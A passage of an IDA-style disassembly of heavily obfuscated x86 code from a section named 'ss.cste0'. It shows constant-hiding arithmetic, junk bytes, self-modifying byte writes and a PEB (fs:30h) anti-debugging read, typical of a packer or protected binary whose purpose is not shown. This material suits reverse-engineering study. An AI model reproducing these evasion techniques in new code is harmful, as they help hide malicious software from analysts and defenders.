		dd 8B338700h, 0DF02E9D7h, 900FFFFh, 2C840FC0h, 68FFFFCBh
		dd 48A09Ch, 1E3CE9h, 668C0F00h,	0FFFFCCh, 7BE9F83Bh, 1Ch
		dd 0A5E9CE13h, 0FFFFE5h
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_535. PRESS KEYPAD	"+" TO EXPAND]
		align 4
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CD94:				; CODE XREF: sub_48A195:loc_48CEEBj
		jmp	nullsub_573
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 87h,	0D6h, 0E9h
		dd 0FFFFE52Fh, 8C0F0000h, 1519h, 0EEDC158h, 0CE9D60Bh
		dd 0Ah
		db 0
; ---------------------------------------------------------------------------

loc_48CDB5:				; DATA XREF: sub_48A195+30B1o
		push	116369F7h
		pop	ebx
		sub	ebx, 0D95727Ch
		xor	ebx, 839B98AEh
		rol	ebx, 10h
		and	ebx, 1A9CE8DFh
		push	edi
		jmp	loc_48ED33
; ---------------------------------------------------------------------------
		dw 0C600h		; CODE XREF: ss.cste0:0048D275j
		dd 64588B00h, 30058Bh, 68560000h, 48B8AAh, 0FFE297E9h
		dd 0E88700FFh, 0FFD40BE9h, 148700FFh, 53595A24h, 1C87DA8Bh
		dd 30E95E24h, 0C3000015h, 0E9C30000h, 0FFFFEB90h, 0C300h
		dd 0DADDAA68h, 0E045E910h
		db 2 dup(0FFh)

; =============== S U B	R O U T	I N E =======================================



sub_48CE1E	proc near		; CODE XREF: sub_48A195+17E6j
					; ss.cste0:0048E587p

; FUNCTION CHUNK AT 0048C174 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0048CBE8 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	[ebx], eax
		pop	ebx
		lea	eax, [ebp-18h]
		push	eax
		push	edi
		push	967A1BC1h
		jmp	loc_48CBE8
sub_48CE1E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CE34:				; CODE XREF: sub_48A195:loc_48CB62j
		push	0A68ED54Ch
		pop	eax
		rol	eax, 14h
		xor	eax, 307DB9C6h
		and	eax, 0E407C229h
		xor	eax, 67A14582h
		add	eax, 162C04E5h
		jmp	near ptr dword_489D4C+25h
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
		dd 5F243C87h, 0C1C201ACh, 0C23103C2h, 0EF28E949h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48CE6E:				; DATA XREF: sub_48A195+1014o
		mov	byte ptr [ecx],	90h
		pop	ecx
		push	48B942h
		jmp	loc_48E1EA
; ---------------------------------------------------------------------------

loc_48CE7C:				; CODE XREF: ss.cste0:0048C58Aj
		jnz	loc_48AE7D
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CE82:				; CODE XREF: sub_48A195:loc_48C57Aj
		rol	esi, 13h
		or	esi, 0B1D5C169h
		add	esi, 4670DAAFh

loc_48CE91:				; DATA XREF: sub_48A195+C3o
		xchg	esi, [esp+4+var_4]
		jmp	loc_48AC50
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2
		dw 0E851h
		dd 1C3Fh
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E2A9

loc_48CEA2:				; CODE XREF: sub_48E2A9+Aj
		jmp	nullsub_579
; END OF FUNCTION CHUNK	FOR sub_48E2A9
; ---------------------------------------------------------------------------
		align 4
		dd 0CB04E900h, 0D913FFFFh, 0DFDE981h, 0F1819CA9h, 0D02BBA1Ah
		dd 4904E181h, 0C181061Eh, 2ABF73h, 0FFF8A0E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CECF:				; CODE XREF: sub_48A195+3DFFj
		push	offset loc_48DA94
		jmp	loc_48D649
; ---------------------------------------------------------------------------

loc_48CED9:				; CODE XREF: sub_48A195+E7Dj
		jno	near ptr dword_48ADA4+2
		xchg	ecx, esi
		jmp	loc_48EA27
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dw 0B6E8h
		db 0DDh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CEEB:				; CODE XREF: sub_48A195+228Ej
		jbe	loc_48CD94
		test	ebp, esi
		jmp	loc_48C32D
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dd 6EE80000h, 9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CF00:				; CODE XREF: sub_48A195+DE1j
		jmp	near ptr dword_489C18+4Fh
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2

; =============== S U B	R O U T	I N E =======================================



sub_48CF06	proc near		; CODE XREF: sub_48A195:loc_48A2F5p
					; ss.cste0:0048D494j

; FUNCTION CHUNK AT 0048BC5C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0048D0B7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048DD3D SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx

loc_48CF0A:				; DATA XREF: sub_48E438-49F2o
		js	loc_48BC5C
		js	loc_48D0B7
		push	offset loc_48AAAC
		jmp	nullsub_545
sub_48CF06	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 0E9h, 88h, 0D0h
		dd 1C87FFFFh, 24148724h, 685ADA8Bh, 3606D670h, 0C928E95Fh
		dd 0C358FFFFh
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CF3D:				; CODE XREF: sub_48A195-4E7j
					; sub_48A195+B5Dj
		push	eax
		mov	eax, esi
		xchg	eax, [esp-4+arg_0]
		mov	esi, ecx
		call	sub_48E8DE
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dw 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_581. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0), 0E9h
		dd 0FFFFD760h
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_575. PRESS KEYPAD	"+" TO EXPAND]
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_48CF58	proc near		; DATA XREF: sub_48A195+1536o

; FUNCTION CHUNK AT 0048BF61 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C6B2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048D440 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D7FE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048DC7B SIZE 0000001B BYTES

		push	0DD34BF7Ch
		pop	ecx
		and	ecx, 0BC36603h
		sub	ecx, 9D794C8Eh
		jmp	loc_48D440
sub_48CF58	endp

; ---------------------------------------------------------------------------

loc_48CF6F:				; CODE XREF: ss.cste0:0048DF7Ej
		mov	byte ptr [esi],	0FFh
		pop	esi
		mov	ebx, ebp
		xchg	ebx, [esp]
		mov	ebp, esp
		add	esp, 0FFFFFFC8h
		call	sub_48C8CE
		add	[eax+30h], ch
		shl	byte ptr [edx+24348725h], cl
		pop	esi
		add	ebx, 0FEF861B9h
		popf
		jmp	loc_48B119
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CF9A:				; CODE XREF: sub_48A195+165j
		pushf
		push	0F5ABDE45h
		xchg	ebp, [esp+4+var_4]
		mov	edx, ebp
		jmp	loc_48B69B
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_582. PRESS KEYPAD	"+" TO EXPAND]
		align 2
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CFAE:				; CODE XREF: sub_48A195+689j
		jmp	loc_48AF98
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------

loc_48CFB5:				; DATA XREF: sub_48A195+84Bo
		xor	edx, 0F284E9h

loc_48CFBB:				; DATA XREF: sub_48A195+2E9Eo
		pop	ebp
		aad	81h
		retn	1CD3h
; ---------------------------------------------------------------------------
		db 29h,	0C5h, 91h
		dd 24148712h, 0D0C015FFh, 6CE90045h, 33000003h,	0E5C8E9C8h
		dd 18BBFFFFh, 0E93C5E51h, 306h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CFE4:				; CODE XREF: sub_48A195+15ACj
		jge	loc_48E194
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
		rol	ecx, 0Ch
		jmp	loc_48E182
; ---------------------------------------------------------------------------
		dd 243C8700h, 6568EC10h, 0E90048B7h, 0FFFFF54Ah
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D006:				; CODE XREF: sub_48A195+3106j
					; sub_48A195:loc_48D8D9j
		call	sub_48E5AE
		add	bl, al
		add	[edi-0E74DBF4h], al
		push	esi
		mov	esi, ecx
		xchg	esi, [esp+14h+var_14]
		push	50587310h
		jmp	loc_48B864
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
		dd 6CDC100h, 13E9F533h
		db 7, 2	dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D02F:				; CODE XREF: sub_48A195+13DAj
		xchg	esi, [esp-0Ch+arg_8]
		pop	esi
		mov	edi, offset loc_48CFBB
		jmp	near ptr dword_48B23C+26h
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2
		dw 820Fh
		dd 0FFFFF753h, 0E90BC0C1h, 0FFFFD914h
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48D04D	proc near		; CODE XREF: sub_48A195+190Ep

var_4		= dword	ptr -4
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0048C46A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0048D7CB SIZE 0000000E BYTES

		xchg	esi, [esp+4+var_4]
		pop	esi
		mov	eax, cs
		xor	al, al
		jmp	loc_48D7CB
sub_48D04D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dw 8100h
		dd 54697EC9h, 0F8C5E9C9h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48D066:				; CODE XREF: sub_48A195-4D5p
		xchg	ebx, [esp]
		pop	ebx
		add	edx, ebp
		push	edi
		call	sub_48E016
; ---------------------------------------------------------------------------
		dw 0
		dd 0FFF67BE9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

loc_48D07A:				; DATA XREF: sub_48A195+86Do
		xchg	ebx, [esp]
		push	0D2E5B9AFh
		pop	esi
		rol	esi, 1Eh
		cmp	esi, 0C729FF7Dh
		jmp	loc_48EC85
; ---------------------------------------------------------------------------
		db 81h,	0D3h, 53h
		dd 81EF6D19h, 7CE470C5h, 0F8E6E9A3h, 0FFFFh, 0F0BA840Fh
		dd 0B268FFFFh, 0E90048ACh, 0FFFFD591h
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48D0B6:				; CODE XREF: ss.cste0:0048BE75j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CF06

loc_48D0B7:				; CODE XREF: sub_48CF06+Aj
					; sub_48D886+4j
		push	edi
		push	offset byte_48ECB9
		jmp	loc_48DD3D
; END OF FUNCTION CHUNK	FOR sub_48CF06
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48D0C3:				; CODE XREF: ss.cste0:0048C758j
		mov	byte ptr [esi],	87h
		pop	esi
		popf
		push	ebp
		mov	ebp, edx
		jmp	near ptr byte_48C4FD+2
; ---------------------------------------------------------------------------
		dd 3C60000h, 81585B87h,	0B5F6E4C0h, 10C0C1D7h, 7BAE9h
		dd 68000000h, 4E4304C9h, 33E9F313h, 0FFFFFEh, 2CC68100h
		dd 810C75F5h, 7591DDE6h, 66C681BBh, 0E9FD172Bh,	0FFFFD93Bh
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_528. PRESS KEYPAD	"+" TO EXPAND]
		dw 0DD68h
		dd 0E92F2703h, 0FFFFEE70h, 0D9810000h, 3109980Dh, 1112E9h
		db 0, 0F7h, 0D7h

; =============== S U B	R O U T	I N E =======================================



sub_48D127	proc near		; CODE XREF: sub_48A195+85Ep
		xchg	ecx, [esp+0]
		pop	ecx
		pushf
		push	offset word_48DF32
		jmp	near ptr dword_48A448+3Fh
sub_48D127	endp

; ---------------------------------------------------------------------------
		dw 840Fh
		dd 0FFFFCC13h, 58240487h, 2404879Dh, 0FFD69AE9h, 9DE800FFh
		db 0E4h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48D14F:				; DATA XREF: sub_48A195:loc_48AC50o
		mov	eax, large fs:30h
		push	ecx
		mov	ecx, offset word_48EB2E
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D15C:				; CODE XREF: sub_48A195+1920j
		jmp	loc_48E00B
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------

locret_48D161:				; CODE XREF: ss.cste0:0048CCE1j
		retn
; ---------------------------------------------------------------------------

loc_48D162:				; CODE XREF: ss.cste0:0048E160j
		jmp	loc_48D270
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------

loc_48D169:				; CODE XREF: ss.cste0:0048A0A6j
		jmp	loc_48C85D
; ---------------------------------------------------------------------------
		align 10h

loc_48D170:				; DATA XREF: sub_48A195+C7Fo
		xor	ecx, 7B7EF719h
		xchg	ecx, [esp]
		call	loc_48D9DF

loc_48D17E:				; CODE XREF: sub_48A195-4E1p
		xchg	edi, [esp]
		pop	edi
		push	ebx
		mov	ebx, ecx
		xchg	ebx, [esp]
		call	sub_48A17A
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D18F:				; CODE XREF: ss.cste0:0048BBD4j
		jmp	loc_48E6B2
; ---------------------------------------------------------------------------
		sbb	ebp, ebx
		jmp	sub_48C4EC
; ---------------------------------------------------------------------------
		align 4
		dd 0F48C0F00h, 0E9FFFFC7h, 16BEh, 0CF84C381h, 0DEE9A32Ch
		dd 0FFFFC7h
		db 0, 0C3h, 0
; ---------------------------------------------------------------------------

loc_48D1B7:				; CODE XREF: ss.cste0:0048C770j
		push	ecx
		push	48BCCFh
		jmp	locret_48A8C8
; ---------------------------------------------------------------------------
		js	loc_48E054
		xchg	edx, [esp]
		pop	edx
		jmp	loc_48E3EE
; ---------------------------------------------------------------------------
		jmp	loc_48A914
; ---------------------------------------------------------------------------
		dw 0F00h
		dd 0FFEC4A89h, 0D2C9E8FFh
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D1E3:				; CODE XREF: sub_48A195+398Dj
		jmp	loc_48E99D
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------

locret_48D1E8:				; CODE XREF: ss.cste0:0048EBB0j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D1E9:				; CODE XREF: sub_48A195+321j
		jmp	loc_48C21F
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 10h
		jmp	loc_48AFFE
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D1F7:				; CODE XREF: sub_48A195:loc_48A321j
		pop	esi
		pop	ebx
		push	offset byte_48C5ED
		jmp	nullsub_547
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		dd 2F38100h, 30A9480h, 241487C3h, 8B5ADA8Bh, 0E7A0E900h
		dd 0FFFFh, 0E5E98C0Fh
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------

loc_48D223:				; CODE XREF: ss.cste0:0048CD1Bj
		jmp	near ptr dword_48C500+6
; ---------------------------------------------------------------------------

loc_48D228:				; CODE XREF: ss.cste0:0048CCF8j
		jmp	loc_48E28D
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C1h
		dd 0CDE906E3h, 0FFFFE5h, 0E9C88700h, 0FFFFE3AAh
		db 0
; ---------------------------------------------------------------------------

loc_48D241:				; DATA XREF: sub_48A195:loc_48B2F9o
		mov	byte ptr [edi],	0Fh
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D244:				; CODE XREF: sub_48A195+1381j
		pop	edi
		push	ebx
		push	offset loc_48CDB5
		jmp	nullsub_572
; ---------------------------------------------------------------------------

loc_48D250:				; CODE XREF: sub_48A195+F74j
		and	edx, 0AAD16A2h
		xor	edx, 467C6D3Bh
		test	edx, 80000h
		jmp	loc_48B9F7
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------

locret_48D267:				; CODE XREF: ss.cste0:0048A130j
		retn
; ---------------------------------------------------------------------------
		dd 0FFFAE3E9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_536. PRESS KEYPAD	"+" TO EXPAND]
		align 10h

loc_48D270:				; CODE XREF: ss.cste0:loc_48D162j
		call	sub_48C150
		jmp	near ptr word_48CDD6+1
; ---------------------------------------------------------------------------
		dw 0C100h
		dd 45E919E0h, 7, 0C8A2E581h, 2BE9C3E0h,	10h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D291:				; CODE XREF: sub_48A195:loc_48E732j
		mov	esi, [ebx]
		xor	edx, edi
		and	edi, 5BC4C963h
		jmp	loc_48D006
; END OF FUNCTION CHUNK	FOR sub_48A195
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_564. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0), 0E9h
		dd 0FFFFEC19h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D2AA:				; CODE XREF: sub_48A195:loc_48DDA2j
		or	ebx, 0EC2C6CB5h
		and	ebx, 0D021C37Dh
		add	ebx, 4508B949h
		add	eax, ebx
		pop	ebx
		jmp	loc_48BD8F
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dd 0C68D0F00h, 0FFFFE8h, 5CC18100h, 0F77D1115h,	0E8B7E9D5h
		dd 0A868FFFFh, 87006A32h, 0D38B241Ch, 572E95Bh,	87990000h
		dd 9D5B241Ch, 3E9098Bh,	2CFFFFD0h, 4ECD6899h, 0C15AACA1h
		dd 0CA8111C2h, 5CF091E1h, 0FFDE30E9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

loc_48D30E:				; CODE XREF: ss.cste0:loc_48C0B2j
		cmp	edx, 0EC65A55h
		jmp	loc_48C63F
; ---------------------------------------------------------------------------
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48D31B	proc near		; DATA XREF: sub_48C4EC+4o
		push	ebx
		push	74C92D64h
		pop	ebx
		and	ebx, 0B49ECE73h
		push	48C01Bh
		jmp	nullsub_582
sub_48D31B	endp

; ---------------------------------------------------------------------------
		align 4
		dd 0CE68BF57h, 0D8E90048h, 0E8FFFFC8h, 0FFFFD087h, 0FFD499E9h
		dd 0BCA468FFh, 8EE90048h
		db 0E3h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48D353:				; CODE XREF: ss.cste0:0048BC9Ej
		mov	byte ptr [edi],	87h
		pop	edi
		mov	ecx, esi

loc_48D359:				; DATA XREF: ss.cste0:0048BC99o
		xchg	ecx, [esp]
		push	edx
		mov	edx, ebx
		xchg	edx, [esp]
		mov	ebx, ecx
		jmp	loc_48E4AD
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C3h
		dd 0F9AFE900h, 689CFFFFh, 0A7B78C37h, 8B242C87h, 0E1815DCDh
		dd 0B915CE62h, 0A3EEC981h, 850FECA4h, 159h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E23D

loc_48D391:				; CODE XREF: sub_48E23D+Aj
		jmp	loc_48E805
; END OF FUNCTION CHUNK	FOR sub_48E23D
; ---------------------------------------------------------------------------
		align 4
		dd 0CCC8815Eh, 0E9B217FAh, 0FFFFE2FEh, 81C30000h, 597FCFC6h
		dd 243487B7h, 48A45C68h, 0C9B5E900h, 0FFFFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_550. PRESS KEYPAD	"+" TO EXPAND]
		db 81h,	0E8h, 85h
		dd 81725323h, 0CDDAE6F8h, 0E9A3E9A0h
		db 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_539. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D3CF:				; CODE XREF: sub_48A195+1DBFj
		jmp	near ptr dword_489DE8+1Bh
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_577. PRESS KEYPAD	"+" TO EXPAND]
		dw 5FE9h
		dd 0FFFFFBh, 0DF4AF681h, 0ACE9AB87h, 81FFFFDDh,	939746EDh
		dd 1FC7C10Ch, 0FFFA01E9h, 0E9C300FFh, 0FFFFE3D4h, 6FE90000h
		dd 0FFFFF2h, 0CCEC8F0Fh, 1487FFFFh, 0C6815A24h,	5EF477D3h
		dd 1157E8h, 0F000000h, 0FFD39381h, 243487FFh, 8B243C87h
		dd 0EF685FF7h, 0E92ADCF7h, 0E5Ch, 0FFC883E8h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D439:				; CODE XREF: sub_48A195+3A38j
		jmp	loc_48DFE2
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 10h
; START	OF FUNCTION CHUNK FOR sub_48CF58

loc_48D440:				; CODE XREF: sub_48CF58+12j
		jmp	loc_48D7FE
; END OF FUNCTION CHUNK	FOR sub_48CF58
; ---------------------------------------------------------------------------
		db 2 dup(0), 0Fh
		dd 0FFD72C8Bh, 0DEA468FFh, 0DBE90048h
		db 0D5h, 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_547. PRESS KEYPAD	"+" TO EXPAND]
		dd 0FE230000h, 3CDE9h, 98C98100h
		db 9Dh,	89h, 5Dh

; =============== S U B	R O U T	I N E =======================================



sub_48D467	proc near		; CODE XREF: sub_48E4E6+3p

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]

loc_48D46A:				; CODE XREF: ss.cste0:loc_48E76Aj
		pop	edi
		xchg	ecx, [esp-4+arg_0]
		mov	ebx, ecx
		pop	ecx
		mov	eax, [eax]
		sub	eax, edx
		jmp	loc_48A8E1
sub_48D467	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_48D47C	proc near		; DATA XREF: sub_48A195:loc_48B436o

arg_0		= dword	ptr  4

		mov	byte ptr [ebx],	87h
		pop	ebx
		push	ebp
		pop	eax
		xchg	eax, [esp-4+arg_0]
		mov	ebp, esp
		push	48ADA6h
		jmp	nullsub_586
sub_48D47C	endp

; ---------------------------------------------------------------------------
		db 2 dup(0), 9Ch
; ---------------------------------------------------------------------------
		jmp	sub_48CF06
; ---------------------------------------------------------------------------
		db 2 dup(0), 23h
; ---------------------------------------------------------------------------
		ffreep	st(1)
		retn
; ---------------------------------------------------------------------------
		db 16h
		dd 0D48E820Fh, 0E952FFFFh, 0FFFFF6EBh, 0C7850000h, 0B5840F5Fh
		dd 64FFFFEBh, 58Fh, 0C4830000h,	9BBB6804h, 1AE964D4h, 0Fh
		db 0
byte_48D4CD	db 8Bh,	0, 9		; DATA XREF: sub_48A195:loc_48D777o
		dd 62850FC0h, 0E9FFFFE1h, 190Ah, 0FFE158E9h, 0F0000FFh
		dd 0FFED058Ah, 0CF1EE8FFh, 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E74D

loc_48D4F0:				; CODE XREF: sub_48E74D+7j
		jmp	loc_48BD02
; END OF FUNCTION CHUNK	FOR sub_48E74D
; ---------------------------------------------------------------------------
		db 2, 0, 0E9h
		dd 0FFFFF4B8h

; =============== S U B	R O U T	I N E =======================================



sub_48D4FC	proc near		; CODE XREF: sub_48A195+18EAj
					; ss.cste0:0048BE70p
		call	loc_48AA0C
		add	cl, ch
		daa

loc_48D504:				; CODE XREF: ss.cste0:0048D51Fj
		out	0FFh, eax
		inc	dword ptr [eax]

locret_48D508:				; CODE XREF: sub_48E272+Fj
		retn
sub_48D4FC	endp

; ---------------------------------------------------------------------------
		db 2 dup(0), 89h
; ---------------------------------------------------------------------------
		add	ebx, [ebx-64h]
		push	48B03Eh
		jmp	loc_48DC3B
; ---------------------------------------------------------------------------
		db 2 dup(0), 81h
; ---------------------------------------------------------------------------
		retn	9CE8h
; ---------------------------------------------------------------------------
		jecxz	short loc_48D504
		jmp	sub_48E94F
; ---------------------------------------------------------------------------
		align 4
		mov	byte ptr [edx],	8Bh
		pop	edx
		xor	esi, 572B3B2Ch
		and	esi, 1411DC81h
		add	esi, 55E504B9h
		and	esi, 263E9C9Ch
		add	esi, 0E024AB44h
		push	offset loc_48AF54
		jmp	locret_48DACA
; ---------------------------------------------------------------------------
		db 2 dup(0)
word_48D556	dw 0C6h			; DATA XREF: sub_48A195:loc_48A971o
		dd 0C7C15887h, 0E0820F07h, 0FFFFCDh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D564:				; CODE XREF: sub_48A195+4091j
		jmp	loc_48B3B9
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D56A:				; CODE XREF: sub_48A195+12A6j
		jmp	nullsub_564
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 10h
		dd 35E9C585h, 0FFFFCDh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D578:				; CODE XREF: sub_48A195+17C8j
		xchg	ecx, [esp+18h+var_18]
		pop	ecx
		add	ecx, 0D83C337Ch
		xchg	ecx, [esp+14h+var_14]
		jmp	locret_48B3DF
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		push	ecx
		push	ebx
		jmp	loc_48DA88
; ---------------------------------------------------------------------------
		db 2 dup(0)
byte_48D593	db 57h			; DATA XREF: sub_48D6EB+9o
		dd 48A6E8BFh, 0C578E900h, 300FFFFh, 1008E9FDh, 8B000000h
		dd 0FE99E9CBh, 0D381FFFFh, 0F0A0A98Ch, 0FFD175E9h, 0D1840FFFh
		dd 0E9FFFFF4h, 0F75h, 0C0C10000h, 1ACFC11Eh, 0FFC5F2E9h
		dd 580000FFh, 0AD54E881h, 0F881FD56h, 3E8975F6h, 0FFF30FE9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D5E5:				; CODE XREF: sub_48A195+137Cj
		sub	eax, 22011294h
		add	eax, 1F419E34h
		repne add [ecx], ch
		shr	cl, 1
		stosb
		cli
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48D5FA:				; CODE XREF: ss.cste0:0048CCD1j
		xchg	edx, [esp]
		pop	edx
		mov	byte ptr [edx],	31h
		pop	edx
		jmp	loc_48C545
; ---------------------------------------------------------------------------
		align 4
dword_48D608	dd 0A2F5051Bh, 9DE80048h, 0E8000014h, 0C7Fh, 182D1D68h
					; DATA XREF: sub_48D886-C5Ao
		dd 9C916873h, 46E90048h, 0C3FFFFFDh, 0DCBDE900h, 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D630:				; CODE XREF: sub_48A195+14FAj
		jmp	near ptr dword_489DE8+9
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		xor	edi, 0A680ED1Dh
		jmp	loc_48E57D
; ---------------------------------------------------------------------------
		dd 0F18B5600h, 0FFC157E8h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D649:				; CODE XREF: sub_48A195+2D3Fj
		jmp	nullsub_543
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		xor	esi, ecx
		jmp	loc_48976A
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D656:				; CODE XREF: sub_48A195+3A7j
		push	ecx
		push	940BDF87h
		pop	ecx
		rol	ecx, 14h
		or	ecx, 0EDF85199h
		add	ecx, 24F8338h
		jmp	loc_48CBCB
; ---------------------------------------------------------------------------

loc_48D671:				; CODE XREF: sub_48A195:loc_48B7F0j
		add	ebx, ebp
		add	ebx, 0EFDDEA05h

